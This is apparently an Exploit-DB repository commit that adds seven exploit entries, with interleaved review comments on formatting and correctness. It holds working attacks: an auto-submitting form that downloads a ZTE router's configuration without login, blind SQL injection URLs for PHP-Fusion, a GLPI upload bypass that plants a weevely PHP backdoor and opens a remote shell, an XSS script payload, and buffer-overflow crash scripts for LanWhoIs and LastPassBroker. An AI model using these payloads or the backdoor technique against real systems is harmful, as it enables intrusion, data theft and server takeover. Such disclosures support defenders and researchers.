DB: 2015-10-07

7 new exploits
Offensive Security 2015-10-07 05:02:02 +00:00
parent de10ad30b5
commit fb214069db
10 changed files with 416 additions and 12 deletions


@ -12912,7 +12912,7 @@ id,file,description,date,author,platform,type,port
14743,platforms/windows/local/14743.c,"avast! <= 5.0.594 license files DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0 14743,platforms/windows/local/14743.c,"avast! <= 5.0.594 license files DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0
14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking Vulnerabilities",2010-08-25,Dr_IDE,windows,local,0 14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking Vulnerabilities",2010-08-25,Dr_IDE,windows,local,0
14750,platforms/windows/local/14750.txt,"VLC Media Player DLL Hijacking Exploit (wintab32.dll)",2010-08-25,Secfence,windows,local,0 14750,platforms/windows/local/14750.txt,"VLC Media Player DLL Hijacking Exploit (wintab32.dll)",2010-08-25,Secfence,windows,local,0
14751,platforms/windows/local/14751.txt,"Microsoft Vista BitLocker Drive Encryption API Hijacking Exploit (fveapi.dll)",2010-08-25,"Beenu Arora",windows,local,0 14751,platforms/windows/local/14751.txt,"Microsoft Vista - BitLocker Drive Encryption API Hijacking Exploit (fveapi.dll)",2010-08-25,"Beenu Arora",windows,local,0
14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 DLL Hijacking Exploit (homeutils9.dll)",2010-08-25,"Beenu Arora",windows,local,0 14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 DLL Hijacking Exploit (homeutils9.dll)",2010-08-25,"Beenu Arora",windows,local,0
14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0 14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0
14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 DLL Hijacking Exploit (cpqdvd.dll)",2010-08-25,"Beenu Arora",windows,local,0 14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 DLL Hijacking Exploit (cpqdvd.dll)",2010-08-25,"Beenu Arora",windows,local,0
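Review bot: the rename of 14751 moves the title to the "Product - Description" form ("Microsoft Vista - BitLocker Drive Encryption API Hijacking Exploit"), but the other DLL-hijacking entries in this same hunk (14743, 14750, 14752, 14753) keep the old unhyphenated form, e.g. "Roxio Photosuite 9 DLL Hijacking Exploit (homeutils9.dll)". If the separator is being standardized, apply it to the whole run of 2010-08-25 entries in one pass rather than one line per commit, otherwise searches on the title prefix stay inconsistent.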
@ -23061,7 +23061,7 @@ id,file,description,date,author,platform,type,port
25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection Vulnerability",2005-06-27,Megabyte,php,webapps,0 25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection Vulnerability",2005-06-27,Megabyte,php,webapps,0
25910,platforms/asp/webapps/25910.txt,"Community Server Forums 'SearchResults.aspx' Cross-Site Scripting Vulnerability",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0 25910,platforms/asp/webapps/25910.txt,"Community Server Forums 'SearchResults.aspx' Cross-Site Scripting Vulnerability",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0
25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service Vulnerability",2005-06-28,fRoGGz,windows,dos,0 25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service Vulnerability",2005-06-28,fRoGGz,windows,dos,0
25912,platforms/windows/local/25912.c,"Windows NT/2K/XP/2K3/Vista/2K8/7/8 - EPATHOBJ Local Ring - Exploit",2013-06-03,"Tavis Ormandy",windows,local,0 25912,platforms/windows/local/25912.c,"Windows NT/2K/XP/2K3/Vista/2K8/7/8 - EPATHOBJ Local Ring Exploit",2013-06-03,"Tavis Ormandy",windows,local,0
25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0 25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0
25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0 25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0
25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0 25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0
@ -29372,7 +29372,7 @@ id,file,description,date,author,platform,type,port
32588,platforms/php/webapps/32588.txt,"BoutikOne CMS 'search_query' Parameter Cross-Site Scripting Vulnerability",2008-11-17,d3v1l,php,webapps,0 32588,platforms/php/webapps/32588.txt,"BoutikOne CMS 'search_query' Parameter Cross-Site Scripting Vulnerability",2008-11-17,d3v1l,php,webapps,0
32621,platforms/php/remote/32621.rb,"SePortal SQLi - Remote Code Execution",2014-03-31,metasploit,php,remote,80 32621,platforms/php/remote/32621.rb,"SePortal SQLi - Remote Code Execution",2014-03-31,metasploit,php,remote,80
32589,platforms/php/webapps/32589.html,"Kimson CMS 'id' Parameter Cross-Site Scripting Vulnerability",2008-11-18,md.r00t,php,webapps,0 32589,platforms/php/webapps/32589.html,"Kimson CMS 'id' Parameter Cross-Site Scripting Vulnerability",2008-11-18,md.r00t,php,webapps,0
32590,platforms/windows/local/32590.c,"Microsoft Windows Vista 'iphlpapi.dll' Local Kernel Buffer Overflow Vulnerability",2008-11-19,"Marius Wachtler",windows,local,0 32590,platforms/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow Vulnerability",2008-11-19,"Marius Wachtler",windows,local,0
32591,platforms/hardware/remote/32591.txt,"3Com Wireless 8760 Dual-Radio 11a/b/g PoE Multiple Security Vulnerabilities",2008-11-19,"Adrian Pastor",hardware,remote,0 32591,platforms/hardware/remote/32591.txt,"3Com Wireless 8760 Dual-Radio 11a/b/g PoE Multiple Security Vulnerabilities",2008-11-19,"Adrian Pastor",hardware,remote,0
32592,platforms/php/webapps/32592.txt,"Easyedit CMS subcategory.php intSubCategoryID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 32592,platforms/php/webapps/32592.txt,"Easyedit CMS subcategory.php intSubCategoryID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0
32593,platforms/php/webapps/32593.txt,"Easyedit CMS page.php intPageID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 32593,platforms/php/webapps/32593.txt,"Easyedit CMS page.php intPageID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0
@ -34686,3 +34686,10 @@ id,file,description,date,author,platform,type,port
38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080 38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080
38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0 38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0
38403,platforms/win32/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win32,local,0 38403,platforms/win32/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win32,local,0
38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0
38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack-Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0
38406,platforms/php/webapps/38406.txt,"PHP-Fusion <= v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - RCE Through File Upload Filter Bypass",2015-10-06,"Raffaele Forte",php,webapps,0
38408,platforms/php/webapps/38408.txt,"Jaow CMS 'add_ons' Parameter Cross Site Scripting Vulnerability",2013-03-23,Metropolis,php,webapps,0
38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin 'wpbanners_show.php' HTML Injection Vulnerability",2013-03-25,"Fernando A. Lagos B",php,webapps,0
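Review bot: the platform column is inconsistent across the new Windows entries: 38403 uses "win32" while 38399, 38404 and 38405 in the same hunk use "windows", so a filter on platform=windows silently misses the TrueCrypt/VeraCrypt entry; pick one value. Separately, the 38405 title reads "Last PassBroker", which does not match the binary name "LastPassBroker.exe" used in the PoC steps of that file; "LastPass Broker" or "LastPassBroker" would actually be findable by search.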


@ -0,0 +1,52 @@
<!--
ZTE ZXHN H108N unauthenticated config download
Copyright 2015 (c) Todor Donev
todor.donev@gmail.com
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
http://pastebin.com/u/hackerscommunity
Tested device:
Model ZXHN H108N
Software Version V3.3.0_MU
Description:
Does not check cookies and credentials on POST
method so attackers could download the config
file without authentication.
\!/\!/\!/
Use at your own Use at your own
risk and educational risk and educational
purpose ONLY! purpose ONLY!
Disclaimer:
This or previous program is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use at your own Use at your own
risk and educational risk and educational
purpose ONLY! purpose ONLY!
/i\/i\/i\
-->
<html>
<title>ZTE ZXHN H108N unauthenticated config download</title>
<body onload=javascript:document.ethack.submit()>
<p>ZTE ZXHN H108N Exploiting..</p>
<form name="ethack" method="POST" action="http://TARGET/getpage.gch?pid=101" enctype="multipart/form-data">
<input type="hidden" name="config" id="config" value="">
</body>
</html>
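Review bot: the `<form>` opened with `action="http://TARGET/getpage.gch?pid=101"` is never closed; `</body>` follows the hidden input directly, so add `</form>` before `</body>` (browsers recover, but the PoC should be well-formed). Also worth stating in the header comment that because `onload` auto-submits the form, the browser that opens this page navigates to TARGET and receives the config download itself; the response is cross-origin and cannot be read back by the hosting page, so this HTML is a convenient way to fire the unauthenticated POST, not an exfiltration vector. Stating the equivalent raw request (method, URL, multipart body with the empty "config" field) in the comment would make the finding reproducible without a browser.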

platforms/php/webapps/38406.txt Executable file

@ -0,0 +1,86 @@
=============================================
MGC ALERT 2015-002
- Original release date: September 18, 2015
- Last revised: October 05, 2015
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
-------------------------
Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07
II. BACKGROUND
-------------------------
PHP-Fusion is a lightweight open source content management system (CMS)
written in PHP.
III. DESCRIPTION
-------------------------
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application. It is possible to inject SQL
code in the variable "status" on the page "members.php".
IV. PROOF OF CONCEPT
-------------------------
The following URL's and parameters have been confirmed to all suffer from
Blind SQL injection.
/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0
Exploiting with true request (with mysql5):
/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0'
AND substr(@@version,1,1)='5
Exploiting with false request:
/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0'
AND substr(@@version,1,1)='4
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
PHP-Fusion <= v7.02.07
VII. SOLUTION
-------------------------
All data received by the application and can be modified by the user,
before making any kind of transaction with them must be validated.
VIII. REFERENCES
-------------------------
https://www.php-fusion.co.uk/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
September 18, 2015 1: Initial release
October 10, 2015 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-------------------------
September 18, 2015 1: Vulnerability acquired by Manuel Garcia Cardenas
September 18, 2015 2: Send to vendor
September 24, 2015 3: Second mail to the verdor without response
October 10, 2015 4: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
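Review bot: the dates do not agree: the header says "Last revised: October 05, 2015", while the revision history and the disclosure timeline both give "October 10, 2015" for the list submission, which is also later than this commit's own date (2015-10-07); correct whichever is wrong. The precondition in section III, "only is needed use the version 1.0 of the HTTP protocol", is stated without a reason; say what differs under HTTP/1.0 (for example which request header is absent and why that bypasses a check) or drop the claim, since a reader cannot reproduce a condition that is not explained. Minor: "verdor" in the timeline.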

platforms/php/webapps/38407.txt Executable file

@ -0,0 +1,92 @@
# Exploit Title: GLPI 0.85.5 RCE through file upload filter bypass
# Date: September 7th, 2015
# Exploit Author: Raffaele Forte <raffaele@backbox.org>
# Vendor Homepage: http://www.glpi-project.org/
# Software Link: https://forge.glpi-project.org/attachments/download/2093/glpi-0.85.5.tar.gz
# Version: GLPI 0.85.5
# Tested on: CentOS release 6.7 (Final), PHP 5.3.3
I. INTRODUCTION
========================================================================
GLPI is the Information Resource-Manager with an additional
Administration-Interface. You can use it to build up a database with an
inventory for your company (computer, software, printers...). It has
enhanced functions to make the daily life for the administrators easier,
like a job-tracking-system with mail-notification and methods to build a
database with basic information about your network-topology.
II. DESCRIPTION
========================================================================
The application allows users to upgrade their own profile. The user has
the possibility to add a new photo as attachment.
The photo that he uploads will be stored into "GLPI_ROOT/files/_pictures/".
This file, for example named "photo.jpeg", will be directly accessible
through "http://host/GLPI_ROOT/files/_pictures/XXXX.jpeg", where "XXXX"
is an ID automatically generated by the system and visible in the HTML
source code.
Besides, the server does not check the extension of the uploaded file,
but only the first bytes within it, that indicates which kind of file is.
Exploiting this flaw, an attacker may upload a tampered jpeg file that
contains php code placed at the end of the file, so that, just changing
the file extention to ".php", by default the php code will be interpreted!
To trigger this vulnerability it is necessary to have an account.
This vulnerability is a combination of two issues:
- predictable uploaded file names and path
- upload of any kind of file, not limited to images
III. PROOF OF CONCEPT
========================================================================
Generate backdoor:
user@backbox:~$ weevely generate pass123 /tmp/bd.php
user@backbox:~$ file /tmp/photo.jpeg
/tmp/photo.jpeg: JPEG image data, JFIF standard 1.02
user@backbox:~$ cat /tmp/bd.php >> /tmp/photo.jpeg
user@backbox:~$ mv /tmp/photo.jpeg /tmp/photo.php
Upload the new tampered photo in GLPI > Settings
Run terminal to the target:
user@backbox:~$ weevely http://host/GLPI_ROOT/files/_pictures/XXXX.php pass123
IV. BUSINESS IMPACT
========================================================================
By uploading a interpretable php file, an attacker may be able to
execute arbitrary code on the server.
This flaw may compromise the integrity of the system and/or expose
sensitive information.
V. SYSTEMS AFFECTED
========================================================================
GLPI Version 0.85.5 is vulnerable (probably all previous versions)
VI. VULNERABILITY HISTORY
========================================================================
September 7th, 2015: Vulnerability identification
September 25th, 2015: Vendor notification
VII. LEGAL NOTICES
========================================================================
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuseof this
information.
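Review bot: the PoC steps skip where /tmp/photo.jpeg comes from: `weevely generate pass123 /tmp/bd.php` writes only bd.php, and the next line runs `file /tmp/photo.jpeg` on a file that was never created. Add a step that supplies a real JPEG before the `cat >>`, and re-run `file` after the append to show the JFIF magic is still at offset 0, since the description says the server checks only "the first bytes" of the upload. Also, section II lists "predictable uploaded file names and path" as one of the two issues, yet two paragraphs earlier says the generated XXXX ID is "visible in the HTML source code"; the name is disclosed, not predicted, so reword that bullet. No fixed version is given under SYSTEMS AFFECTED, and the timeline ends at vendor notification with no response recorded.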


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/58658/info
Jaow CMS is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Jaow CMS 2.4.8 is vulnerable; other versions may also be affected.
http://www.example.com/path/add_ons.php?add_ons=[XSS]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/58671/info
The Banners Lite plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
http://www.example.com/wordpress/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_<script>alert(/XSSProof-of-Concept/)</script>

platforms/windows/dos/38404.py Executable file

@ -0,0 +1,124 @@
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-LANWHOIS-BUFFER-OVERFLOW-10062015.txt
Vendor:
================================
www.lantricks.com
Product:
================================
LanWhoIs.exe 1.0.1.120
LanWhoIs querys and returns domain (site) holder or IP address informations.
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
======================
LanWhoIs contains a file parsing stack buffer overflow vulnerability. The program has a whois_result.xml
XML file located under the LanWhoIs directory. This file holds results returned from program queries. If
LanWhoIs is installed under c:\ instead of 'Program Files' etc.. on shared PC and a non adminstrator user
has access they can still edit the whois_result.xml, abusing the vuln program and possibly escalate privileges
or run arbitrary code etc.
e.g.
<WhoisResult>
<Result>
<QueryString>216.239.37.99</QueryString>
<ServerName>whois.arin.net</ServerName>
<QueryDate>02.01.2005 16:17:30</QueryDate>
<QueryType>-1</QueryType>
We can exploit the program by injecting malicious payload into the <QueryString> node of the local XML file
causing buffer overflow overwriting both pointers to the NSEH & SEH exception handlers & control EIP at about 676 bytes.
e.g.
<QueryString>AAAAAAAAAAAAAAAAAAAAAAAAAAAAA.....shellcode...etc..</QueryString>
WinDbg stack dump....
(2048.17cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
eax=02bdfec8 ebx=02bdff14 ecx=02bdfecc edx=41414141 esi=00000000 edi=00000000
eip=00404bc8 esp=02bdfc04 ebp=02bdfecc iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
image00400000+0x4bc8:
00404bc8 8b4af8 mov ecx,dword ptr [edx-8] ds:002b:41414139=????????
0:011> !exchain
02bdfed4: 52525252
Invalid exception stack at 42424242
registers...
EAX 00000000
ECX 52525252
EDX 7714B4AD ntdll.7714B4AD
EBX 00000000
ESP 04D0F668
EBP 04D0F688
ESI 00000000
EDI 00000000
EIP 52525252
POC code:
==========
Run below script, then copy and insert payload into <QueryString> </QueryString> XML node
and run the application. Next, select the address in the Results window pane and then click Query button
to run a whois lookup or use the 'F3' keyboard cmd to execute and KABOOOOOOOOOOOOOOOM!!!
'''
file=open("C:\\hyp3rlinx\\LanTricks\LanWhoIs\\HELL","w")
payload="A"*676+"BBBB"+"RRRR" <--------------------#KABOOOOOOOOOOOOOOOOOOM!!!
file.write(payload)
file.close()
'''
Public Disclosure:
===================
October 6, 2015
Exploitation Technique:
=======================
Local
Tested on Windows 7 SP1
Vulnerable Parameter:
======================
QueryString
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
by hyp3rlinx
'''
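Review bot: the script does not parse as Python: on the line `payload="A"*676+"BBBB"+"RRRR" <--------------------#KABOOOOOOOOOOOOOOOOOOM!!!` the `<----` arrow sits outside the comment, so the interpreter sees a `<` comparison whose right operand is a run of unary minuses with nothing after them and raises SyntaxError before writing the file. Move the arrow inside the `#` comment. The open() path also mixes `\\` with a bare `\L` in "C:\\hyp3rlinx\\LanTricks\LanWhoIs\\HELL"; use a raw string or escape consistently. Finally, the two register listings describe different states: the WinDbg block shows eip=00404bc8 with edx=41414141 (first-chance access violation inside the parser), while the second listing shows EIP 52525252 (after the overwritten SEH record is dispatched); label each so the reader does not take them as one dump, and note which one the "control EIP at about 676 bytes" claim refers to.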

platforms/windows/dos/38405.py Executable file

@ -0,0 +1,28 @@
'''
********************************************************************************************
# Exploit Title: Last PassBroker Stack-based BOF
# Date: 9/23/2015
# Exploit Author: Un_N0n
# Software Link: https://lastpass.com/download
# Version: 3.2.16
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- open 'LastPassBroker.exe'.
2- A Input-Box will appear asking for Email and Password,
In password field paste in the contents of crash.txt
3- Hit Login.
~Software will Crash.
[Code to produce crash.txt]:
'''
junk = "A"*66666
file = open("CRASH.txt",'w')
file.write(junk)
file.close()
'''
> Vendor Notified, Fixed in latest Release.
**********************************************************************************************
'''
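Review bot: "Vendor Notified, Fixed in latest Release" gives no fixed version, so a reader cannot tell which releases above 3.2.16 are safe; add the release number or date. The steps refer to crash.txt while the script writes CRASH.txt (harmless on Windows, confusing elsewhere), and the crash requires the local user to paste the 66666-byte string into their own password field, so the header should say this is a local input-handling crash with no remote trigger; that matches the "dos" classification in files.csv.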


@ -1,13 +1,12 @@
source: http://www.securityfocus.com/bid/32357/info // source: http://www.securityfocus.com/bid/32357/info
// Microsoft Windows Vista is prone to a buffer-overflow vulnerability because of insufficient boundary checks.
Microsoft Windows Vista is prone to a buffer-overflow vulnerability because of insufficient boundary checks. // Local attackers could exploit this issue to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to execute arbitrary code with SYSTEM-level privileges, but this has not been confirmed.
Local attackers could exploit this issue to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to execute arbitrary code with SYSTEM-level privileges, but this has not been confirmed. // Windows Vista SP1 is vulnerable to this issue.
Windows Vista SP1 is vulnerable to this issue. // UPDATE (November 25, 2008): Since this issue may be exploitable only by members of the administrative group, the security implication of this issue may be negated.
UPDATE (November 25, 2008): Since this issue may be exploitable only by members of the administrative group, the security implication of this issue may be negated.
#define _WIN32_WINNT 0x0600 #define _WIN32_WINNT 0x0600
#define WIN32_LEAN_AND_MEAN #define WIN32_LEAN_AND_MEAN


@ -1,8 +1,8 @@
source: http://www.securityfocus.com/bid/38044/info // source: http://www.securityfocus.com/bid/38044/info
Microsoft Windows is prone to a local privilege-escalation vulnerability that occurs in the kernel. // Microsoft Windows is prone to a local privilege-escalation vulnerability that occurs in the kernel.
An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial of service. // An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial of service.
// -------------------------------------------------------- // --------------------------------------------------------
// Windows NtFilterToken() Double Free Vulnerability // Windows NtFilterToken() Double Free Vulnerability